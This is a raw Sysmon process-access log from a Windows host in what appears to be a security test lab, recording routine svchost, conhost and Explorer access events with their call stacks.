16:05:23.856{7901BC46-4987-6008-0D00-00000000A301}996484C:\Windows\system32\svchost.exe{7901BC46-4A99-6008-1401-00000000A301}5960C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000030251Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:05:23.856{7901BC46-4987-6008-0D00-00000000A301}996484C:\Windows\system32\svchost.exe{7901BC46-4A99-6008-1401-00000000A301}5960C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000030250Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:05:23.856{7901BC46-4987-6008-0D00-00000000A301}996484C:\Windows\system32\svchost.exe{7901BC46-4A99-6008-1401-00000000A301}5960C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000030249Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:05:23.856{7901BC46-4987-6008-0D00-00000000A301}996484C:\Windows\system32\svchost.exe{7901BC46-4A99-6008-1401-00000000A301}5960C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000030248Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:05:23.856{7901BC46-4987-6008-0D00-00000000A301}996484C:\Windows\system32\svchost.exe{7901BC46-4A99-6008-1401-00000000A301}5960C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000030247Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:05:23.856{7901BC46-4987-6008-0D00-00000000A301}996484C:\Windows\system32\svchost.exe{7901BC46-4A99-6008-1401-00000000A301}5960C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000030246Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:05:23.856{7901BC46-4987-6008-0D00-00000000A301}996484C:\Windows\system32\svchost.exe{7901BC46-4A99-6008-1401-00000000A301}5960C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000030245Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:05:23.856{7901BC46-4987-6008-0D00-00000000A301}996484C:\Windows\system32\svchost.exe{7901BC46-4A99-6008-1401-00000000A301}5960C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000030244Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:05:23.856{7901BC46-4987-6008-0D00-00000000A301}996484C:\Windows\system32\svchost.exe{7901BC46-4A8C-6008-0601-00000000A301}2500C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000030243Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:05:23.856{7901BC46-4987-6008-0D00-00000000A301}996484C:\Windows\system32\svchost.exe{7901BC46-4A8C-6008-0601-00000000A301}2500C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000030242Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:05:23.856{7901BC46-4987-6008-0D00-00000000A301}996484C:\Windows\system32\svchost.exe{7901BC46-4A8C-6008-0601-00000000A301}2500C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000030241Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:05:23.856{7901BC46-4987-6008-0D00-00000000A301}996484C:\Windows\system32\svchost.exe{7901BC46-4A8C-6008-0601-00000000A301}2500C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000030240Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:05:23.856{7901BC46-4987-6008-0D00-00000000A301}996484C:\Windows\system32\svchost.exe{7901BC46-4A8C-6008-0601-00000000A301}2500C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000030239Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:05:23.856{7901BC46-4987-6008-0D00-00000000A301}996484C:\Windows\system32\svchost.exe{7901BC46-4A8C-6008-0601-00000000A301}2500C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000030238Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:05:23.856{7901BC46-4987-6008-0D00-00000000A301}996484C:\Windows\system32\svchost.exe{7901BC46-4A8C-6008-0601-00000000A301}2500C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000030237Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:05:23.856{7901BC46-4987-6008-0D00-00000000A301}996484C:\Windows\system32\svchost.exe{7901BC46-4A8C-6008-0601-00000000A301}2500C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000030236Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:05:23.856{7901BC46-4987-6008-0D00-00000000A301}996484C:\Windows\system32\svchost.exe{7901BC46-4A8C-6008-0601-00000000A301}2500C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000030235Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:05:23.856{7901BC46-4987-6008-0D00-00000000A301}996484C:\Windows\system32\svchost.exe{7901BC46-4A8C-6008-0601-00000000A301}2500C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000030234Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:05:23.856{7901BC46-4987-6008-0D00-00000000A301}996484C:\Windows\system32\svchost.exe{7901BC46-4A8C-6008-0601-00000000A301}2500C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000030233Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:05:23.856{7901BC46-4987-6008-0D00-00000000A301}996484C:\Windows\system32\svchost.exe{7901BC46-4A8C-6008-0601-00000000A301}2500C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000030232Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:05:23.856{7901BC46-4987-6008-0D00-00000000A301}996484C:\Windows\system32\svchost.exe{7901BC46-4A8C-6008-0601-00000000A301}2500C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000030231Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:05:23.856{7901BC46-4987-6008-0D00-00000000A301}996484C:\Windows\system32\svchost.exe{7901BC46-4A8C-6008-0601-00000000A301}2500C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000030230Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:05:23.856{7901BC46-4987-6008-0D00-00000000A301}996484C:\Windows\system32\svchost.exe{7901BC46-4A8C-6008-0601-00000000A301}2500C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000030229Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:05:23.856{7901BC46-4987-6008-0D00-00000000A301}996484C:\Windows\system32\svchost.exe{7901BC46-4A8C-6008-0601-00000000A301}2500C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000030228Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:05:23.856{7901BC46-4987-6008-0D00-00000000A301}996484C:\Windows\system32\svchost.exe{7901BC46-4A9B-6008-1501-00000000A301}6076C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000030227Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:05:23.856{7901BC46-4987-6008-0D00-00000000A301}996484C:\Windows\system32\svchost.exe{7901BC46-4A9B-6008-1501-00000000A301}6076C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000030226Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:05:23.856{7901BC46-4987-6008-0D00-00000000A301}996484C:\Windows\system32\svchost.exe{7901BC46-4A9B-6008-1501-00000000A301}6076C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000030253Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:05:46.028{7901BC46-4987-6008-0D00-00000000A301}9961420C:\Windows\system32\svchost.exe{7901BC46-4FA9-6008-4305-00000000A301}7420C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+b157|c:\windows\system32\rpcss.dll+7897|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000030269Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:06:07.933{7901BC46-4A1A-6008-B100-00000000A301}26404044C:\Windows\system32\conhost.exe{7901BC46-54EF-6008-D506-00000000A301}7196C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000030268Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:06:07.933{7901BC46-4986-6008-0C00-00000000A301}6084504C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000030267Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:06:07.933{7901BC46-4986-6008-0C00-00000000A301}6084504C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000030266Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:06:07.933{7901BC46-4986-6008-0C00-00000000A301}6084504C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000030265Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 